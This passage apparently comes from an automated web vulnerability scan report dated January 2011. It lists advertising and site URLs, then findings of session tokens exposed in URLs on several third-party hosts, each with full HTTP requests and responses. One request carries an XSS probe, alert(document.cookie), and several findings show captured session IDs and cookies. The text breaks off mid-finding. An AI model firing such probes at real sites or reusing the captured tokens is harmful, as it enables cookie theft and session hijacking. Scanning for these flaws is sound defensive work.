http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
http://www.amazon.com/
http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22
http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22
http://www.amazon.com/b/
http://www.amazon.com/dp/0313363153
http://www.amazon.com/dp/0814410960
http://www.amazon.com/dp/B000EFAO1G
http://www.amazon.com/dp/B001AIM6V2
http://www.amazon.com/dp/B0037UT1LY
http://www.amazon.com/gp/product/0596804946
http://www.amazon.com/gp/site-directory/x22
http://www.apture.com/js/apture.js
http://www.dzone.com/links/add.html
http://www.facebook.com/extern/login_status.php
http://www.metacafe.com/fplayer/
http://www.mindbodygreen.com/passvote.action
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
http://www.officedepot.com/promo.do
http://www1.whdh.com/features/articles/holiday_helping/BO144709/
http://www1.whdh.com/features/articles/holiday_helping/BO144719/
http://www1.whdh.com/features/articles/holiday_helping/BO144727/
http://www1.whdh.com/features/articles/holiday_helping/BO144733/

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://autotrader.tt.omtrdc.net
Path:	/m2/autotrader/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard?mboxHost=www.autotrader.com&mboxSession=1295921983404-727382&mboxPage=1295921983404-727382&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&page=%2Findex.jsp&mbox=global_css&mboxId=0&mboxTime=1295900383412&mboxURL=http%3A%2F%2Fwww.autotrader.com%2F%3Fbc4cb%2522%253balert(document.cookie)%2F%2F1ee177b82c%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F55&mboxVersion=39

Request

GET /m2/autotrader/mbox/standard?mboxHost=www.autotrader.com&mboxSession=1295921983404-727382&mboxPage=1295921983404-727382&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&page=%2Findex.jsp&mbox=global_css&mboxId=0&mboxTime=1295900383412&mboxURL=http%3A%2F%2Fwww.autotrader.com%2F%3Fbc4cb%2522%253balert(document.cookie)%2F%2F1ee177b82c%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F55&mboxVersion=39 HTTP/1.1
Host: autotrader.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1312
Date: Tue, 25 Jan 2011 02:19:41 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('global_css',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-globa
...[SNIP]...

9.2. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=2709&token=TOT09

Request

GET /bh/set.aspx?action=add&advid=2709&token=TOT09 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://7newsboston.disqus.com/stats.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=gFEcJzqCjXJj

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
Set-Cookie: cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:55:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

9.3. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

http://feedburner.google.com/fb/a/home?gsessionid=WUwm58oBrG3PsoODTDjQ7A
http://feedburner.google.com/fb/a/tos?gsessionid=WUwm58oBrG3PsoODTDjQ7A

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 15:11:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=WUwm58oBrG3PsoODTDjQ7A; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Mon, 24 Jan 2011 15:11:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=WUwm58oBrG3PsoODTDjQ7A">FeedBurner</a>
...[SNIP]...
<div id="footer">
©2004–2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=WUwm58oBrG3PsoODTDjQ7A">Terms of Service</a>
...[SNIP]...

9.4. http://groups.google.com/group/joomla-commits/topics previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://groups.google.com
Path:	/group/joomla-commits/topics

Issue detail

The response contains the following links that appear to contain session tokens:

http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=09fa9134a3246f13&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=382296799f67c09f&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=502b8c7a41665d4c&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=5a4980db4f055f21&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=77e4c87b752bb5c5&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9353275f1009dd78&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9abbcb1686b81484&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9c677c9cf1392509&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=d2b2d7b77ca52577&oldstate=0
http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=e478bafa4fa631e6&oldstate=0

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:58 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@9c677c9cf1392509"
name="watchjoomla-commits@9c677c9cf1392509"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9c677c9cf1392509&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@9c677c9cf1392509_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@e478bafa4fa631e6"
name="watchjoomla-commits@e478bafa4fa631e6"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=e478bafa4fa631e6&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@e478bafa4fa631e6_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@09fa9134a3246f13"
name="watchjoomla-commits@09fa9134a3246f13"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=09fa9134a3246f13&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@09fa9134a3246f13_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@9353275f1009dd78"
name="watchjoomla-commits@9353275f1009dd78"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9353275f1009dd78&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@9353275f1009dd78_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@502b8c7a41665d4c"
name="watchjoomla-commits@502b8c7a41665d4c"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=502b8c7a41665d4c&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@502b8c7a41665d4c_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@77e4c87b752bb5c5"
name="watchjoomla-commits@77e4c87b752bb5c5"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=77e4c87b752bb5c5&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@77e4c87b752bb5c5_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@d2b2d7b77ca52577"
name="watchjoomla-commits@d2b2d7b77ca52577"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=d2b2d7b77ca52577&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@d2b2d7b77ca52577_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@382296799f67c09f"
name="watchjoomla-commits@382296799f67c09f"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=382296799f67c09f&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@382296799f67c09f_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@9abbcb1686b81484"
name="watchjoomla-commits@9abbcb1686b81484"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9abbcb1686b81484&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@9abbcb1686b81484_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@5a4980db4f055f21"
name="watchjoomla-commits@5a4980db4f055f21"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=5a4980db4f055f21&oldstate=0"
><img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@5a4980db4f055f21_img"
name="wat
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

